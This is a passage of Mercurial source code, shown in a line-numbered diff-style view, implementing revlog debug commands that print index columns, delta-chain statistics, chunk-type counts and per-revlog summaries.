135 | 137 | @debug_column(b"comp-mode", size=4, verbose=True) |
|
136 | 138 | def compression_mode(index, rev, entry, hexfn): |
|
137 | 139 | return b"%d" % entry[constants.ENTRY_DATA_COMPRESSION_MODE] |
|
138 | 140 | |
|
139 | 141 | |
|
140 | 142 | @debug_column(b"data-offset", size=20, verbose=True) |
|
141 | 143 | def data_offset(index, rev, entry, hexfn): |
|
142 | 144 | field = entry[constants.ENTRY_DATA_OFFSET] |
|
143 | 145 | field >>= 16 |
|
144 | 146 | return b"%d" % field |
|
145 | 147 | |
|
146 | 148 | |
|
147 | 149 | @debug_column(b"chunk-size", size=10, verbose=True) |
|
148 | 150 | def data_chunk_size(index, rev, entry, hexfn): |
|
149 | 151 | return b"%d" % entry[constants.ENTRY_DATA_COMPRESSED_LENGTH] |
|
150 | 152 | |
|
151 | 153 | |
|
152 | 154 | @debug_column(b"sd-comp-mode", size=7, verbose=True) |
|
153 | 155 | def sidedata_compression_mode(index, rev, entry, hexfn): |
|
154 | 156 | compression = entry[constants.ENTRY_SIDEDATA_COMPRESSION_MODE] |
|
155 | 157 | if compression == constants.COMP_MODE_PLAIN: |
|
156 | 158 | return b"plain" |
|
157 | 159 | elif compression == constants.COMP_MODE_DEFAULT: |
|
158 | 160 | return b"default" |
|
159 | 161 | elif compression == constants.COMP_MODE_INLINE: |
|
160 | 162 | return b"inline" |
|
161 | 163 | else: |
|
162 | 164 | return b"%d" % compression |
|
163 | 165 | |
|
164 | 166 | |
|
165 | 167 | @debug_column(b"sidedata-offset", size=20, verbose=True) |
|
166 | 168 | def sidedata_offset(index, rev, entry, hexfn): |
|
167 | 169 | return b"%d" % entry[constants.ENTRY_SIDEDATA_OFFSET] |
|
168 | 170 | |
|
169 | 171 | |
|
170 | 172 | @debug_column(b"sd-chunk-size", size=10, verbose=True) |
|
171 | 173 | def sidedata_chunk_size(index, rev, entry, hexfn): |
|
172 | 174 | return b"%d" % entry[constants.ENTRY_SIDEDATA_COMPRESSED_LENGTH] |
|
173 | 175 | |
|
174 | 176 | |
|
175 | 177 | def debug_index( |
|
176 | 178 | ui, |
|
177 | 179 | repo, |
|
178 | 180 | formatter, |
|
179 | 181 | revlog, |
|
180 | 182 | full_node, |
|
181 | 183 | ): |
|
182 | 184 | """display index data for a revlog""" |
|
183 | 185 | if full_node: |
|
184 | 186 | hexfn = nodemod.hex |
|
185 | 187 | else: |
|
186 | 188 | hexfn = nodemod.short |
|
187 | 189 | |
|
188 | 190 | idlen = 12 |
|
189 | 191 | for i in revlog: |
|
190 | 192 | idlen = len(hexfn(revlog.node(i))) |
|
191 | 193 | break |
|
192 | 194 | |
|
193 | 195 | fm = formatter |
|
194 | 196 | |
|
195 | 197 | header_pieces = [] |
|
196 | 198 | for column in INDEX_ENTRY_DEBUG_COLUMN: |
|
197 | 199 | if column.verbose_only and not ui.verbose: |
|
198 | 200 | continue |
|
199 | 201 | size = column.get_size(idlen) |
|
200 | 202 | name = column.name |
|
201 | 203 | header_pieces.append(name.rjust(size)) |
|
202 | 204 | |
|
203 | 205 | fm.plain(b' '.join(header_pieces) + b'\n') |
|
204 | 206 | |
|
205 | 207 | index = revlog.index |
|
206 | 208 | |
|
207 | 209 | for rev in revlog: |
|
208 | 210 | fm.startitem() |
|
209 | 211 | entry = index[rev] |
|
210 | 212 | first = True |
|
211 | 213 | for column in INDEX_ENTRY_DEBUG_COLUMN: |
|
212 | 214 | if column.verbose_only and not ui.verbose: |
|
213 | 215 | continue |
|
214 | 216 | if not first: |
|
215 | 217 | fm.plain(b' ') |
|
216 | 218 | first = False |
|
217 | 219 | |
|
218 | 220 | size = column.get_size(idlen) |
|
219 | 221 | value = column.value_func(index, rev, entry, hexfn) |
|
220 | 222 | display = b"%%%ds" % size |
|
221 | 223 | fm.write(column.name, display, value) |
|
222 | 224 | fm.plain(b'\n') |
|
223 | 225 | |
|
224 | 226 | fm.end() |
|
225 | 227 | |
|
226 | 228 | |
|
227 | 229 | def dump(ui, revlog): |
|
228 | 230 | """perform the work for `hg debugrevlog --dump""" |
|
229 | 231 | # XXX seems redundant with debug index ? |
|
230 | 232 | r = revlog |
|
231 | 233 | numrevs = len(r) |
|
232 | 234 | ui.write( |
|
233 | 235 | ( |
|
234 | 236 | b"# rev p1rev p2rev start end deltastart base p1 p2" |
|
235 | 237 | b" rawsize totalsize compression heads chainlen\n" |
|
236 | 238 | ) |
|
237 | 239 | ) |
|
238 | 240 | ts = 0 |
|
239 | 241 | heads = set() |
|
240 | 242 | |
|
241 | 243 | for rev in range(numrevs): |
|
242 | 244 | dbase = r.deltaparent(rev) |
|
243 | 245 | if dbase == -1: |
|
244 | 246 | dbase = rev |
|
245 | 247 | cbase = r.chainbase(rev) |
|
246 | 248 | clen = r.chainlen(rev) |
|
247 | 249 | p1, p2 = r.parentrevs(rev) |
|
248 | 250 | rs = r.rawsize(rev) |
|
249 | 251 | ts = ts + rs |
|
250 | 252 | heads -= set(r.parentrevs(rev)) |
|
251 | 253 | heads.add(rev) |
|
252 | 254 | try: |
|
253 | 255 | compression = ts / r.end(rev) |
|
254 | 256 | except ZeroDivisionError: |
|
255 | 257 | compression = 0 |
|
256 | 258 | ui.write( |
|
257 | 259 | b"%5d %5d %5d %5d %5d %10d %4d %4d %4d %7d %9d " |
|
258 | 260 | b"%11d %5d %8d\n" |
|
259 | 261 | % ( |
|
260 | 262 | rev, |
|
261 | 263 | p1, |
|
262 | 264 | p2, |
|
263 | 265 | r.start(rev), |
|
264 | 266 | r.end(rev), |
|
265 | 267 | r.start(dbase), |
|
266 | 268 | r.start(cbase), |
|
267 | 269 | r.start(p1), |
|
268 | 270 | r.start(p2), |
|
269 | 271 | rs, |
|
270 | 272 | ts, |
|
271 | 273 | compression, |
|
272 | 274 | len(heads), |
|
273 | 275 | clen, |
|
274 | 276 | ) |
|
275 | 277 | ) |
|
276 | 278 | |
|
277 | 279 | |
|
278 | 280 | def debug_revlog(ui, revlog): |
|
279 | 281 | """code for `hg debugrevlog`""" |
|
280 | 282 | r = revlog |
|
281 | 283 | format = r._format_version |
|
282 | 284 | v = r._format_flags |
|
283 | 285 | flags = [] |
|
284 | 286 | gdelta = False |
|
285 | 287 | if v & constants.FLAG_INLINE_DATA: |
|
286 | 288 | flags.append(b'inline') |
|
287 | 289 | if v & constants.FLAG_GENERALDELTA: |
|
288 | 290 | gdelta = True |
|
289 | 291 | flags.append(b'generaldelta') |
|
290 | 292 | if not flags: |
|
291 | 293 | flags = [b'(none)'] |
|
292 | 294 | |
|
293 | 295 | ### the total size of stored content if incompressed. |
|
294 | 296 | full_text_total_size = 0 |
|
295 | 297 | ### tracks merge vs single parent |
|
296 | 298 | nummerges = 0 |
|
297 | 299 | |
|
298 | 300 | ### tracks ways the "delta" are build |
|
299 | 301 | # nodelta |
|
300 | 302 | numempty = 0 |
|
301 | 303 | numemptytext = 0 |
|
302 | 304 | numemptydelta = 0 |
|
303 | 305 | # full file content |
|
304 | 306 | numfull = 0 |
|
305 | 307 | # intermediate snapshot against a prior snapshot |
|
306 | 308 | numsemi = 0 |
|
307 | 309 | # snapshot count per depth |
|
308 | 310 | numsnapdepth = collections.defaultdict(lambda: 0) |
|
309 | 311 | # number of snapshots with a non-ancestor delta |
|
310 | 312 | numsnapdepth_nad = collections.defaultdict(lambda: 0) |
|
311 | 313 | # delta against previous revision |
|
312 | 314 | numprev = 0 |
|
313 | 315 | # delta against prev, where prev is a non-ancestor |
|
314 | 316 | numprev_nad = 0 |
|
315 | 317 | # delta against first or second parent (not prev) |
|
316 | 318 | nump1 = 0 |
|
317 | 319 | nump2 = 0 |
|
318 | 320 | # delta against neither prev nor parents |
|
319 | 321 | numother = 0 |
|
320 | 322 | # delta against other that is a non-ancestor |
|
321 | 323 | numother_nad = 0 |
|
322 | 324 | # delta against prev that are also first or second parent |
|
323 | 325 | # (details of `numprev`) |
|
324 | 326 | nump1prev = 0 |
|
325 | 327 | nump2prev = 0 |
|
326 | 328 | |
|
327 | 329 | # data about delta chain of each revs |
|
328 | 330 | chainlengths = [] |
|
329 | 331 | chainbases = [] |
|
330 | 332 | chainspans = [] |
|
331 | 333 | |
|
332 | 334 | # data about each revision |
|
333 | 335 | datasize = [None, 0, 0] |
|
334 | 336 | fullsize = [None, 0, 0] |
|
335 | 337 | semisize = [None, 0, 0] |
|
336 | 338 | # snapshot count per depth |
|
337 | 339 | snapsizedepth = collections.defaultdict(lambda: [None, 0, 0]) |
|
338 | 340 | deltasize = [None, 0, 0] |
|
339 | 341 | chunktypecounts = {} |
|
340 | 342 | chunktypesizes = {} |
|
341 | 343 | |
|
342 | 344 | def addsize(size, l): |
|
343 | 345 | if l[0] is None or size < l[0]: |
|
344 | 346 | l[0] = size |
|
345 | 347 | if size > l[1]: |
|
346 | 348 | l[1] = size |
|
347 | 349 | l[2] += size |
|
348 | 350 | |
|
349 | 351 | with r.reading(): |
|
350 | 352 | numrevs = len(r) |
|
351 | 353 | for rev in range(numrevs): |
|
352 | 354 | p1, p2 = r.parentrevs(rev) |
|
353 | 355 | delta = r.deltaparent(rev) |
|
354 | 356 | if format > 0: |
|
355 | 357 | s = r.rawsize(rev) |
|
356 | 358 | full_text_total_size += s |
|
357 | 359 | addsize(s, datasize) |
|
358 | 360 | if p2 != nodemod.nullrev: |
|
359 | 361 | nummerges += 1 |
|
360 | 362 | size = r.length(rev) |
|
361 | 363 | if delta == nodemod.nullrev: |
|
362 | 364 | chainlengths.append(0) |
|
363 | 365 | chainbases.append(r.start(rev)) |
|
364 | 366 | chainspans.append(size) |
|
365 | 367 | if size == 0: |
|
366 | 368 | numempty += 1 |
|
367 | 369 | numemptytext += 1 |
|
368 | 370 | else: |
|
369 | 371 | numfull += 1 |
|
370 | 372 | numsnapdepth[0] += 1 |
|
371 | 373 | addsize(size, fullsize) |
|
372 | 374 | addsize(size, snapsizedepth[0]) |
|
373 | 375 | else: |
|
374 | 376 | nad = ( |
|
375 | 377 | delta != p1 |
|
376 | 378 | and delta != p2 |
|
377 | 379 | and not r.isancestorrev(delta, rev) |
|
378 | 380 | ) |
|
379 | 381 | chainlengths.append(chainlengths[delta] + 1) |
|
380 | 382 | baseaddr = chainbases[delta] |
|
381 | 383 | revaddr = r.start(rev) |
|
382 | 384 | chainbases.append(baseaddr) |
|
383 | 385 | chainspans.append((revaddr - baseaddr) + size) |
|
384 | 386 | if size == 0: |
|
385 | 387 | numempty += 1 |
|
386 | 388 | numemptydelta += 1 |
|
387 | 389 | elif r.issnapshot(rev): |
|
388 | 390 | addsize(size, semisize) |
|
389 | 391 | numsemi += 1 |
|
390 | 392 | depth = r.snapshotdepth(rev) |
|
391 | 393 | numsnapdepth[depth] += 1 |
|
392 | 394 | if nad: |
|
393 | 395 | numsnapdepth_nad[depth] += 1 |
|
394 | 396 | addsize(size, snapsizedepth[depth]) |
|
395 | 397 | else: |
|
396 | 398 | addsize(size, deltasize) |
|
397 | 399 | if delta == rev - 1: |
|
398 | 400 | numprev += 1 |
|
399 | 401 | if delta == p1: |
|
400 | 402 | nump1prev += 1 |
|
401 | 403 | elif delta == p2: |
|
402 | 404 | nump2prev += 1 |
|
403 | 405 | elif nad: |
|
404 | 406 | numprev_nad += 1 |
|
405 | 407 | elif delta == p1: |
|
406 | 408 | nump1 += 1 |
|
407 | 409 | elif delta == p2: |
|
408 | 410 | nump2 += 1 |
|
409 | 411 | elif delta != nodemod.nullrev: |
|
410 | 412 | numother += 1 |
|
411 | 413 | numother_nad += 1 |
|
412 | 414 | |
|
413 | 415 | # Obtain data on the raw chunks in the revlog. |
|
414 | 416 | if hasattr(r, '_inner'): |
|
415 | 417 | segment = r._inner.get_segment_for_revs(rev, rev)[1] |
|
416 | 418 | else: |
|
417 | 419 | segment = r._revlog._getsegmentforrevs(rev, rev)[1] |
|
418 | 420 | if segment: |
|
419 | 421 | chunktype = bytes(segment[0:1]) |
|
420 | 422 | else: |
|
421 | 423 | chunktype = b'empty' |
|
422 | 424 | |
|
423 | 425 | if chunktype not in chunktypecounts: |
|
424 | 426 | chunktypecounts[chunktype] = 0 |
|
425 | 427 | chunktypesizes[chunktype] = 0 |
|
426 | 428 | |
|
427 | 429 | chunktypecounts[chunktype] += 1 |
|
428 | 430 | chunktypesizes[chunktype] += size |
|
429 | 431 | |
|
430 | 432 | # Adjust size min value for empty cases |
|
431 | 433 | for size in (datasize, fullsize, semisize, deltasize): |
|
432 | 434 | if size[0] is None: |
|
433 | 435 | size[0] = 0 |
|
434 | 436 | |
|
435 | 437 | numdeltas = numrevs - numfull - numempty - numsemi |
|
436 | 438 | numoprev = numprev - nump1prev - nump2prev - numprev_nad |
|
437 | 439 | num_other_ancestors = numother - numother_nad |
|
438 | 440 | totalrawsize = datasize[2] |
|
439 | 441 | datasize[2] /= numrevs |
|
440 | 442 | fulltotal = fullsize[2] |
|
441 | 443 | if numfull == 0: |
|
442 | 444 | fullsize[2] = 0 |
|
443 | 445 | else: |
|
444 | 446 | fullsize[2] /= numfull |
|
445 | 447 | semitotal = semisize[2] |
|
446 | 448 | snaptotal = {} |
|
447 | 449 | if numsemi > 0: |
|
448 | 450 | semisize[2] /= numsemi |
|
449 | 451 | for depth in snapsizedepth: |
|
450 | 452 | snaptotal[depth] = snapsizedepth[depth][2] |
|
451 | 453 | snapsizedepth[depth][2] /= numsnapdepth[depth] |
|
452 | 454 | |
|
453 | 455 | deltatotal = deltasize[2] |
|
454 | 456 | if numdeltas > 0: |
|
455 | 457 | deltasize[2] /= numdeltas |
|
456 | 458 | totalsize = fulltotal + semitotal + deltatotal |
|
457 | 459 | avgchainlen = sum(chainlengths) / numrevs |
|
458 | 460 | maxchainlen = max(chainlengths) |
|
459 | 461 | maxchainspan = max(chainspans) |
|
460 | 462 | compratio = 1 |
|
461 | 463 | if totalsize: |
|
462 | 464 | compratio = totalrawsize / totalsize |
|
463 | 465 | |
|
464 | 466 | basedfmtstr = b'%%%dd\n' |
|
465 | 467 | basepcfmtstr = b'%%%dd %s(%%5.2f%%%%)\n' |
|
466 | 468 | |
|
467 | 469 | def dfmtstr(max): |
|
468 | 470 | return basedfmtstr % len(str(max)) |
|
469 | 471 | |
|
470 | 472 | def pcfmtstr(max, padding=0): |
|
471 | 473 | return basepcfmtstr % (len(str(max)), b' ' * padding) |
|
472 | 474 | |
|
473 | 475 | def pcfmt(value, total): |
|
474 | 476 | if total: |
|
475 | 477 | return (value, 100 * float(value) / total) |
|
476 | 478 | else: |
|
477 | 479 | return value, 100.0 |
|
478 | 480 | |
|
479 | 481 | ui.writenoi18n(b'format : %d\n' % format) |
|
480 | 482 | ui.writenoi18n(b'flags : %s\n' % b', '.join(flags)) |
|
481 | 483 | |
|
482 | 484 | ui.write(b'\n') |
|
483 | 485 | fmt = pcfmtstr(totalsize) |
|
484 | 486 | fmt2 = dfmtstr(totalsize) |
|
485 | 487 | ui.writenoi18n(b'revisions : ' + fmt2 % numrevs) |
|
486 | 488 | ui.writenoi18n(b' merges : ' + fmt % pcfmt(nummerges, numrevs)) |
|
487 | 489 | ui.writenoi18n( |
|
488 | 490 | b' normal : ' + fmt % pcfmt(numrevs - nummerges, numrevs) |
|
489 | 491 | ) |
|
490 | 492 | ui.writenoi18n(b'revisions : ' + fmt2 % numrevs) |
|
491 | 493 | ui.writenoi18n(b' empty : ' + fmt % pcfmt(numempty, numrevs)) |
|
492 | 494 | ui.writenoi18n( |
|
493 | 495 | b' text : ' |
|
494 | 496 | + fmt % pcfmt(numemptytext, numemptytext + numemptydelta) |
|
495 | 497 | ) |
|
496 | 498 | ui.writenoi18n( |
|
497 | 499 | b' delta : ' |
|
498 | 500 | + fmt % pcfmt(numemptydelta, numemptytext + numemptydelta) |
|
499 | 501 | ) |
|
500 | 502 | ui.writenoi18n( |
|
501 | 503 | b' snapshot : ' + fmt % pcfmt(numfull + numsemi, numrevs) |
|
502 | 504 | ) |
|
503 | 505 | for depth in sorted(numsnapdepth): |
|
504 | 506 | base = b' lvl-%-3d : ' % depth |
|
505 | 507 | count = fmt % pcfmt(numsnapdepth[depth], numrevs) |
|
506 | 508 | pieces = [base, count] |
|
507 | 509 | if numsnapdepth_nad[depth]: |
|
508 | 510 | pieces[-1] = count = count[:-1] # drop the final '\n' |
|
509 | 511 | more = b' non-ancestor-bases: ' |
|
510 | 512 | anc_count = fmt |
|
511 | 513 | anc_count %= pcfmt(numsnapdepth_nad[depth], numsnapdepth[depth]) |
|
512 | 514 | pieces.append(more) |
|
513 | 515 | pieces.append(anc_count) |
|
514 | 516 | ui.write(b''.join(pieces)) |
|
515 | 517 | ui.writenoi18n(b' deltas : ' + fmt % pcfmt(numdeltas, numrevs)) |
|
516 | 518 | ui.writenoi18n(b'revision size : ' + fmt2 % totalsize) |
|
517 | 519 | ui.writenoi18n( |
|
518 | 520 | b' snapshot : ' + fmt % pcfmt(fulltotal + semitotal, totalsize) |
|
519 | 521 | ) |
|
520 | 522 | for depth in sorted(numsnapdepth): |
|
521 | 523 | ui.write( |
|
522 | 524 | (b' lvl-%-3d : ' % depth) |
|
523 | 525 | + fmt % pcfmt(snaptotal[depth], totalsize) |
|
524 | 526 | ) |
|
525 | 527 | ui.writenoi18n(b' deltas : ' + fmt % pcfmt(deltatotal, totalsize)) |
|
526 | 528 | |
|
527 | 529 | letters = string.ascii_letters.encode('ascii') |
|
528 | 530 | |
|
529 | 531 | def fmtchunktype(chunktype): |
|
530 | 532 | if chunktype == b'empty': |
|
531 | 533 | return b' %s : ' % chunktype |
|
532 | 534 | elif chunktype in letters: |
|
533 | 535 | return b' 0x%s (%s) : ' % (nodemod.hex(chunktype), chunktype) |
|
534 | 536 | else: |
|
535 | 537 | return b' 0x%s : ' % nodemod.hex(chunktype) |
|
536 | 538 | |
|
537 | 539 | ui.write(b'\n') |
|
538 | 540 | ui.writenoi18n(b'chunks : ' + fmt2 % numrevs) |
|
539 | 541 | for chunktype in sorted(chunktypecounts): |
|
540 | 542 | ui.write(fmtchunktype(chunktype)) |
|
541 | 543 | ui.write(fmt % pcfmt(chunktypecounts[chunktype], numrevs)) |
|
542 | 544 | ui.writenoi18n(b'chunks size : ' + fmt2 % totalsize) |
|
543 | 545 | for chunktype in sorted(chunktypecounts): |
|
544 | 546 | ui.write(fmtchunktype(chunktype)) |
|
545 | 547 | ui.write(fmt % pcfmt(chunktypesizes[chunktype], totalsize)) |
|
546 | 548 | |
|
547 | 549 | ui.write(b'\n') |
|
548 | 550 | b_total = b"%d" % full_text_total_size |
|
549 | 551 | p_total = [] |
|
550 | 552 | while len(b_total) > 3: |
|
551 | 553 | p_total.append(b_total[-3:]) |
|
552 | 554 | b_total = b_total[:-3] |
|
553 | 555 | p_total.append(b_total) |
|
554 | 556 | p_total.reverse() |
|
555 | 557 | b_total = b' '.join(p_total) |
|
556 | 558 | |
|
557 | 559 | ui.write(b'\n') |
|
558 | 560 | ui.writenoi18n(b'total-stored-content: %s bytes\n' % b_total) |
|
559 | 561 | ui.write(b'\n') |
|
560 | 562 | fmt = dfmtstr(max(avgchainlen, maxchainlen, maxchainspan, compratio)) |
|
561 | 563 | ui.writenoi18n(b'avg chain length : ' + fmt % avgchainlen) |
|
562 | 564 | ui.writenoi18n(b'max chain length : ' + fmt % maxchainlen) |
|
563 | 565 | ui.writenoi18n(b'max chain reach : ' + fmt % maxchainspan) |
|
564 | 566 | ui.writenoi18n(b'compression ratio : ' + fmt % compratio) |
|
565 | 567 | |
|
566 | 568 | if format > 0: |
|
567 | 569 | ui.write(b'\n') |
|
568 | 570 | ui.writenoi18n( |
|
569 | 571 | b'uncompressed data size (min/max/avg) : %d / %d / %d\n' |
|
570 | 572 | % tuple(datasize) |
|
571 | 573 | ) |
|
572 | 574 | ui.writenoi18n( |
|
573 | 575 | b'full revision size (min/max/avg) : %d / %d / %d\n' |
|
574 | 576 | % tuple(fullsize) |
|
575 | 577 | ) |
|
576 | 578 | ui.writenoi18n( |
|
577 | 579 | b'inter-snapshot size (min/max/avg) : %d / %d / %d\n' |
|
578 | 580 | % tuple(semisize) |
|
579 | 581 | ) |
|
580 | 582 | for depth in sorted(snapsizedepth): |
|
581 | 583 | if depth == 0: |
|
582 | 584 | continue |
|
583 | 585 | ui.writenoi18n( |
|
584 | 586 | b' level-%-3d (min/max/avg) : %d / %d / %d\n' |
|
585 | 587 | % ((depth,) + tuple(snapsizedepth[depth])) |
|
586 | 588 | ) |
|
587 | 589 | ui.writenoi18n( |
|
588 | 590 | b'delta size (min/max/avg) : %d / %d / %d\n' |
|
589 | 591 | % tuple(deltasize) |
|
590 | 592 | ) |
|
591 | 593 | |
|
592 | 594 | if numdeltas > 0: |
|
593 | 595 | ui.write(b'\n') |
|
594 | 596 | fmt = pcfmtstr(numdeltas) |
|
595 | 597 | fmt2 = pcfmtstr(numdeltas, 4) |
|
596 | 598 | ui.writenoi18n( |
|
597 | 599 | b'deltas against prev : ' + fmt % pcfmt(numprev, numdeltas) |
|
598 | 600 | ) |
|
599 | 601 | if numprev > 0: |
|
600 | 602 | ui.writenoi18n( |
|
601 | 603 | b' where prev = p1 : ' + fmt2 % pcfmt(nump1prev, numprev) |
|
602 | 604 | ) |
|
603 | 605 | ui.writenoi18n( |
|
604 | 606 | b' where prev = p2 : ' + fmt2 % pcfmt(nump2prev, numprev) |
|
605 | 607 | ) |
|
606 | 608 | ui.writenoi18n( |
|
607 | 609 | b' other-ancestor : ' + fmt2 % pcfmt(numoprev, numprev) |
|
608 | 610 | ) |
|
609 | 611 | ui.writenoi18n( |
|
610 | 612 | b' unrelated : ' + fmt2 % pcfmt(numoprev, numprev) |
|
611 | 613 | ) |
|
612 | 614 | if gdelta: |
|
613 | 615 | ui.writenoi18n( |
|
614 | 616 | b'deltas against p1 : ' + fmt % pcfmt(nump1, numdeltas) |
|
615 | 617 | ) |
|
616 | 618 | ui.writenoi18n( |
|
617 | 619 | b'deltas against p2 : ' + fmt % pcfmt(nump2, numdeltas) |
|
618 | 620 | ) |
|
619 | 621 | ui.writenoi18n( |
|
620 | 622 | b'deltas against ancs : ' |
|
621 | 623 | + fmt % pcfmt(num_other_ancestors, numdeltas) |
|
622 | 624 | ) |
|
623 | 625 | ui.writenoi18n( |
|
624 | 626 | b'deltas against other : ' |
|
625 | 627 | + fmt % pcfmt(numother_nad, numdeltas) |
|
626 | 628 | ) |
|
627 | 629 | |
|
628 | 630 | |
|
629 | 631 | def debug_delta_find(ui, revlog, rev, base_rev=nodemod.nullrev): |
|
630 | 632 | """display the search process for a delta""" |
|
631 | 633 | deltacomputer = deltautil.deltacomputer( |
|
632 | 634 | revlog, |
|
633 | 635 | write_debug=ui.write, |
|
634 | 636 | debug_search=not ui.quiet, |
|
635 | 637 | ) |
|
636 | 638 | |
|
637 | 639 | node = revlog.node(rev) |
|
638 | 640 | p1r, p2r = revlog.parentrevs(rev) |
|
639 | 641 | p1 = revlog.node(p1r) |
|
640 | 642 | p2 = revlog.node(p2r) |
|
641 | 643 | full_text = revlog.revision(rev) |
|
642 | 644 | btext = [full_text] |
|
643 | 645 | textlen = len(btext[0]) |
|
644 | 646 | cachedelta = None |
|
645 | 647 | flags = revlog.flags(rev) |
|
646 | 648 | |
|
647 | 649 | if base_rev != nodemod.nullrev: |
|
648 | 650 | base_text = revlog.revision(base_rev) |
|
649 | 651 | delta = mdiff.textdiff(base_text, full_text) |
|
650 | 652 | |
|
651 | 653 | cachedelta = (base_rev, delta, constants.DELTA_BASE_REUSE_TRY) |
|
652 | 654 | btext = [None] |
|
653 | 655 | |
|
654 | 656 | revinfo = revlogutils.revisioninfo( |
|
655 | 657 | node, |
|
656 | 658 | p1, |
|
657 | 659 | p2, |
|
658 | 660 | btext, |
|
659 | 661 | textlen, |
|
660 | 662 | cachedelta, |
|
661 | 663 | flags, |
|
662 | 664 | ) |
|
663 | 665 | |
|
664 | 666 | fh = revlog._datafp() |
|
665 | 667 | deltacomputer.finddeltainfo(revinfo, fh, target_rev=rev) |
|
666 | 668 | |
|
667 | 669 | |
|
668 | 670 | def debug_revlog_stats( |
|
669 | 671 | repo, fm, changelog: bool, manifest: bool, filelogs: bool |
|
670 | 672 | ): |
|
671 | 673 | """Format revlog statistics for debugging purposes |
|
672 | 674 | |
|
673 | 675 | fm: the output formatter. |
|
674 | 676 | """ |
|
675 | 677 | fm.plain(b'rev-count data-size inl type target \n') |
|
676 | 678 | |
|
677 | 679 | revlog_entries = [e for e in repo.store.walk() if e.is_revlog] |
|
678 | 680 | revlog_entries.sort(key=lambda e: (e.revlog_type, e.target_id)) |
|
679 | 681 | |
|
680 | 682 | for entry in revlog_entries: |
|
681 | 683 | if not changelog and entry.is_changelog: |
|
682 | 684 | continue |
|
683 | 685 | elif not manifest and entry.is_manifestlog: |
|
684 | 686 | continue |
|
685 | 687 | elif not filelogs and entry.is_filelog: |
|
686 | 688 | continue |
|
687 | 689 | rlog = entry.get_revlog_instance(repo).get_revlog() |
|
688 | 690 | fm.startitem() |
|
689 | 691 | nb_rev = len(rlog) |
|
690 | 692 | inline = rlog._inline |
|
691 | 693 | data_size = rlog._get_data_offset(nb_rev - 1) |
|
692 | 694 | |
|
693 | 695 | target = rlog.target |
|
694 | 696 | revlog_type = b'unknown' |
|
695 | 697 | revlog_target = b'' |
|
696 | 698 | if target[0] == constants.KIND_CHANGELOG: |
|
697 | 699 | revlog_type = b'changelog' |
|
698 | 700 | elif target[0] == constants.KIND_MANIFESTLOG: |
|
699 | 701 | revlog_type = b'manifest' |
|
700 | 702 | revlog_target = target[1] |
|
701 | 703 | elif target[0] == constants.KIND_FILELOG: |
|
702 | 704 | revlog_type = b'file' |
|
703 | 705 | revlog_target = target[1] |
|
704 | 706 | |
|
705 | 707 | fm.write(b'revlog.rev-count', b'%9d', nb_rev) |
|
706 | 708 | fm.write(b'revlog.data-size', b'%12d', data_size) |
|
707 | 709 | |
|
708 | 710 | fm.write(b'revlog.inline', b' %-3s', b'yes' if inline else b'no') |
|
709 | 711 | fm.write(b'revlog.type', b' %-9s', revlog_type) |
|
710 | 712 | fm.write(b'revlog.target', b' %s', revlog_target) |
|
711 | 713 | |
|
712 | 714 | fm.plain(b'\n') |
|
713 | 715 | |
|
714 | 716 | |
|
715 | 717 | class DeltaChainAuditor: |
|
716 | 718 | def __init__(self, revlog): |
|
717 | 719 | self._revlog = revlog |
|
718 | 720 | self._index = self._revlog.index |
|
719 | 721 | self._generaldelta = revlog.delta_config.general_delta |
|
720 | 722 | self._chain_size_cache = {} |
|
721 | 723 | # security to avoid crash on corrupted revlogs |
|
722 | 724 | self._total_revs = len(self._index) |
|
723 | 725 | |
|
724 | 726 | def revinfo(self, rev, size_info=True, dist_info=True, sparse_info=True): |
|
725 | 727 | e = self._index[rev] |
|
726 | 728 | compsize = e[constants.ENTRY_DATA_COMPRESSED_LENGTH] |
|
727 | 729 | uncompsize = e[constants.ENTRY_DATA_UNCOMPRESSED_LENGTH] |
|
728 | 730 | |
|
729 | 731 | base = e[constants.ENTRY_DELTA_BASE] |
|
730 | 732 | p1 = e[constants.ENTRY_PARENT_1] |
|
731 | 733 | p2 = e[constants.ENTRY_PARENT_2] |
|
732 | 734 | |
|
733 | 735 | # If the parents of a revision has an empty delta, we never try to |
|
734 | 736 | # delta against that parent, but directly against the delta base of |
|
735 | 737 | # that parent (recursively). It avoids adding a useless entry in the |
|
736 | 738 | # chain. |
|
737 | 739 | # |
|
738 | 740 | # However we need to detect that as a special case for delta-type, that |
|
739 | 741 | # is not simply "other". |
|
740 | 742 | p1_base = p1 |
|
741 | 743 | if p1 != nodemod.nullrev and p1 < self._total_revs: |
|
742 | 744 | e1 = self._index[p1] |
|
743 | 745 | while e1[constants.ENTRY_DATA_COMPRESSED_LENGTH] == 0: |
|
744 | 746 | new_base = e1[constants.ENTRY_DELTA_BASE] |
|
745 | 747 | if ( |
|
746 | 748 | new_base == p1_base |
|
747 | 749 | or new_base == nodemod.nullrev |
|
748 | 750 | or new_base >= self._total_revs |
|
749 | 751 | ): |
|
750 | 752 | break |
|
751 | 753 | p1_base = new_base |
|
752 | 754 | e1 = self._index[p1_base] |
|
753 | 755 | p2_base = p2 |
|
754 | 756 | if p2 != nodemod.nullrev and p2 < self._total_revs: |
|
755 | 757 | e2 = self._index[p2] |
|
756 | 758 | while e2[constants.ENTRY_DATA_COMPRESSED_LENGTH] == 0: |
|
757 | 759 | new_base = e2[constants.ENTRY_DELTA_BASE] |
|
758 | 760 | if ( |
|
759 | 761 | new_base == p2_base |
|
760 | 762 | or new_base == nodemod.nullrev |
|
761 | 763 | or new_base >= self._total_revs |
|
762 | 764 | ): |
|
763 | 765 | break |
|
764 | 766 | p2_base = new_base |
|
765 | 767 | e2 = self._index[p2_base] |
|
766 | 768 | |
|
767 | 769 | if self._generaldelta: |
|
768 | 770 | if base == p1: |
|
769 | 771 | deltatype = b'p1' |
|
770 | 772 | elif base == p2: |
|
771 | 773 | deltatype = b'p2' |
|
772 | 774 | elif base == rev: |
|
773 | 775 | deltatype = b'base' |
|
774 | 776 | elif base == p1_base: |
|
775 | 777 | deltatype = b'skip1' |
|
776 | 778 | elif base == p2_base: |
|
777 | 779 | deltatype = b'skip2' |
|
778 | 780 | elif self._revlog.issnapshot(rev): |
|
779 | 781 | deltatype = b'snap' |
|
780 | 782 | elif base == rev - 1: |
|
781 | 783 | deltatype = b'prev' |
|
782 | 784 | else: |
|
783 | 785 | deltatype = b'other' |
|
784 | 786 | else: |
|
785 | 787 | if base == rev: |
|
786 | 788 | deltatype = b'base' |
|
787 | 789 | else: |
|
788 | 790 | deltatype = b'prev' |
|
789 | 791 | |
|
790 | 792 | chain = self._revlog._deltachain(rev)[0] |
|
791 | 793 | |
|
792 | 794 | data = { |
|
793 | 795 | 'p1': p1, |
|
